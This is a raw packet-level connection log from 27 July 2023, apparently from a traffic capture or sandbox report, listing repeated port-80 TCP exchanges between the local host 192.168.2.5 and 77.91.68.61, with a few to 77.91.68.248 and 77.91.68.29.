Jul 27, 2023 01:33:09.041292906 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.164916992 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.165791988 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.211108923 CEST	80	49743	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.211298943 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.212627888 CEST	80	49744	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.212770939 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.215158939 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.261224985 CEST	80	49744	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.264782906 CEST	80	49744	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.264878035 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.376240969 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.391925097 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.422307968 CEST	80	49744	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.422373056 CEST	49744	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.437922001 CEST	80	49745	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.438035965 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.438489914 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.484394073 CEST	80	49745	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.488131046 CEST	80	49745	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.488214016 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.637212992 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.638067007 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.683041096 CEST	80	49745	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.683120966 CEST	49745	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.684174061 CEST	80	49746	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.684281111 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.684741974 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.730236053 CEST	80	49746	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.734213114 CEST	80	49746	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.734436989 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.842864990 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.843800068 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.888600111 CEST	80	49746	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.888711929 CEST	49746	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.889678955 CEST	80	49747	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.889770031 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.891262054 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.935460091 CEST	80	49747	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.939722061 CEST	80	49747	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.939821005 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.060774088 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.061635017 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.104892969 CEST	80	49747	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.106250048 CEST	80	49748	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.106390953 CEST	49747	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.106493950 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.144289970 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:10.152626038 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.188879013 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:10.197402954 CEST	80	49748	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.201159954 CEST	80	49748	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.203105927 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.332971096 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.333744049 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.378041029 CEST	80	49749	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.378077984 CEST	80	49748	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.378144979 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.378175974 CEST	49748	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.378555059 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.423060894 CEST	80	49749	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.427519083 CEST	80	49749	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.427647114 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.566040993 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.566893101 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.607722998 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:10.610475063 CEST	80	49749	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.610604048 CEST	49749	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.611474991 CEST	80	49750	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.611598015 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.642268896 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.654999018 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:10.657377958 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:10.665541887 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:10.665574074 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:10.689704895 CEST	80	49750	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.693387032 CEST	80	49750	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.693602085 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.710493088 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:10.710529089 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:10.719788074 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:10.796854973 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.797245979 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.841700077 CEST	80	49750	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.841736078 CEST	80	49752	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.841877937 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.841923952 CEST	49750	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.843250990 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.857074976 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:10.888497114 CEST	80	49752	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.891763926 CEST	80	49752	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:10.891844988 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.998392105 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:10.999315977 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.043971062 CEST	80	49752	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.044019938 CEST	80	49753	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.044156075 CEST	49752	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.044893026 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.048084021 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.093585968 CEST	80	49753	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.098570108 CEST	80	49753	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.098819017 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.202308893 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.203169107 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.247126102 CEST	80	49753	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.247159958 CEST	80	49754	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.247216940 CEST	49753	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.247277021 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.255734921 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.299937963 CEST	80	49754	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.303713083 CEST	80	49754	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.305123091 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.467933893 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.479640007 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.512082100 CEST	80	49754	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.512193918 CEST	49754	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.524503946 CEST	80	49755	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.525912046 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.536714077 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.581577063 CEST	80	49755	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.586210012 CEST	80	49755	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.586397886 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.715428114 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.718978882 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.761903048 CEST	80	49755	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.761989117 CEST	49755	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.764775991 CEST	80	49757	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.764928102 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.769758940 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.816282988 CEST	80	49757	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.820856094 CEST	80	49757	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.821561098 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.936630011 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.937563896 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.981640100 CEST	80	49758	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.982166052 CEST	80	49757	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:11.983309031 CEST	49757	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.984483004 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:11.987854004 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.032224894 CEST	80	49758	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.037190914 CEST	80	49758	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.037930012 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.154985905 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.155639887 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.199516058 CEST	80	49758	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.199625015 CEST	49758	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.199839115 CEST	80	49759	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.200176001 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.201853037 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.246375084 CEST	80	49759	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.250585079 CEST	80	49759	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.251458883 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.393783092 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.394575119 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.438267946 CEST	80	49759	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.438432932 CEST	49759	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.438589096 CEST	80	49760	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.438689947 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.439107895 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.484177113 CEST	80	49760	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.489739895 CEST	80	49760	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.491602898 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.624103069 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.631334066 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.670079947 CEST	80	49760	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.670183897 CEST	49760	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.677658081 CEST	80	49761	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.677807093 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.712929010 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.757999897 CEST	80	49761	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.762373924 CEST	80	49761	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.762737989 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.874943018 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.875076056 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.919437885 CEST	80	49762	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.919548035 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.919687986 CEST	80	49761	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.919846058 CEST	49761	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.922636032 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:12.967019081 CEST	80	49762	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.971185923 CEST	80	49762	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:12.971290112 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.128595114 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.129586935 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.172890902 CEST	80	49762	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.172985077 CEST	49762	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.174210072 CEST	80	49763	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.174314022 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.175569057 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.220463037 CEST	80	49763	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.224049091 CEST	80	49763	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.229574919 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.528677940 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.529834032 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.574124098 CEST	80	49763	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.574189901 CEST	49763	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.574680090 CEST	80	49764	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.574775934 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.582711935 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.627414942 CEST	80	49764	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.631290913 CEST	80	49764	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.631603956 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.806929111 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.851743937 CEST	80	49764	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.854475021 CEST	49764	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.871620893 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.916101933 CEST	80	49765	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:13.916259050 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:13.961833000 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.006315947 CEST	80	49765	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.010406971 CEST	80	49765	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.012404919 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.265014887 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.266036987 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.309921026 CEST	80	49765	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.310756922 CEST	80	49766	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.310916901 CEST	49765	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.310966015 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.350761890 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:14.395592928 CEST	80	49766	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.399617910 CEST	80	49766	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:14.401654005 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.253510952 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.254590034 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.298409939 CEST	80	49766	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:15.298541069 CEST	49766	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.299345016 CEST	80	49767	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:15.299448967 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.342317104 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.386745930 CEST	80	49767	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:15.390353918 CEST	80	49767	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:15.390525103 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:15.722090006 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:15.722265005 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:16.453301907 CEST	49751	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:16.498096943 CEST	80	49751	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:16.856592894 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:16.857563019 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:16.901083946 CEST	80	49767	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:16.901238918 CEST	49767	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:16.904563904 CEST	80	49768	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:16.904762983 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.016721964 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.061387062 CEST	80	49768	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.064950943 CEST	80	49768	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.065171003 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.436820984 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.437808037 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.481689930 CEST	80	49768	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.481831074 CEST	49768	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.482763052 CEST	80	49769	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.482904911 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.497637033 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.542442083 CEST	80	49769	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.547416925 CEST	80	49769	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.547518969 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.703797102 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.715440989 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.749130964 CEST	80	49769	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.749197006 CEST	49769	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.759594917 CEST	80	49770	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.759706974 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.761435032 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.807353020 CEST	80	49770	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.809418917 CEST	80	49770	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.809513092 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.921916008 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.922820091 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.966245890 CEST	80	49770	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.966330051 CEST	49770	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.966800928 CEST	80	49771	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:17.966897964 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:17.977741957 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.021955013 CEST	80	49771	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.025604010 CEST	80	49771	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.025808096 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.156850100 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.157759905 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.201051950 CEST	80	49771	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.201123953 CEST	49771	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.202107906 CEST	80	49772	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.202250957 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.203859091 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.248560905 CEST	80	49772	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.251871109 CEST	80	49772	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.251940966 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.381072998 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.381722927 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.425484896 CEST	80	49772	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.425559998 CEST	49772	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.426270962 CEST	80	49773	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.426356077 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.426799059 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.471465111 CEST	80	49773	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.475754023 CEST	80	49773	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.475851059 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.597573042 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.607248068 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.642385006 CEST	80	49773	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.642491102 CEST	49773	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.652101040 CEST	80	49774	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.652234077 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.671825886 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.716348886 CEST	80	49774	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.720021963 CEST	80	49774	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.720190048 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.851231098 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.853276968 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.896116018 CEST	80	49774	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.896198988 CEST	49774	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.897537947 CEST	80	49775	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.900494099 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.904755116 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:18.949578047 CEST	80	49775	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.953665972 CEST	80	49775	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:18.953756094 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.068728924 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.069484949 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.113444090 CEST	80	49775	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.113622904 CEST	49775	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.113780022 CEST	80	49776	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.113882065 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.116760015 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.161305904 CEST	80	49776	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.164931059 CEST	80	49776	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.165081024 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.308358908 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.309951067 CEST	49777	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.352678061 CEST	80	49776	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.352852106 CEST	49776	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.354315042 CEST	80	49777	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:19.354466915 CEST	49777	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:19.407572985 CEST	49777	80	192.168.2.5	77.91.68.61
